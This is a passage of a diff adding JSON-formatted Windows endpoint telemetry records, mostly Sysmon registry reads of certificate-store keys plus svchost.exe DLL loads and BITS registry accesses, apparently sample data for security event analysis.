"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bitsperf.dll", + "image_path": "C:\\Windows\\System32\\bitsperf.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877610000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570877610000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path": "C:\\WINDOWS\\Sysmon.exe",
+ "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed",
+ "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs",
+ "registry_value": "CRLs",
+ "timestamp": 131883570877610000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path": "C:\\WINDOWS\\Sysmon.exe",
+ "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed",
+ "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs",
+ "registry_value": "CTLs",
+ "timestamp": 131883570877610000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path": "C:\\WINDOWS\\Sysmon.exe",
+ "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates",
+ "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed",
+ "registry_value": "Disallowed",
+ "timestamp": 131883570877610000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path": "C:\\WINDOWS\\Sysmon.exe",
+ "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed",
+ "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates",
+ "registry_value": "Certificates",
+ "timestamp": 131883570877610000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path": "C:\\WINDOWS\\Sysmon.exe",
+ "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed",
+
"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", + "registry_value": "PerfMMFileName", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883570877610000, + "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 
131883570877770000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path": "C:\\WINDOWS\\Sysmon.exe",
+ "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates",
+ "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed",
+ "registry_value": "Disallowed",
+ "timestamp": 131883570877770000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path": "C:\\WINDOWS\\Sysmon.exe",
+ "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed",
+ "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates",
+ "registry_value": "Certificates",
+ "timestamp": 131883570877770000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path": "C:\\WINDOWS\\Sysmon.exe",
+ "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed",
+ "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs",
+ "registry_value": "CRLs",
+ "timestamp": 131883570877770000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path": "C:\\WINDOWS\\Sysmon.exe",
+ "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed",
+ "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs",
+ "registry_value": "CTLs",
+ "timestamp": 131883570877770000,
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}"
+ },
+ {
+ "event_type": "registry",
+ "pid": 2376,
+ "process_name": "Sysmon.exe",
+ "process_path":
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 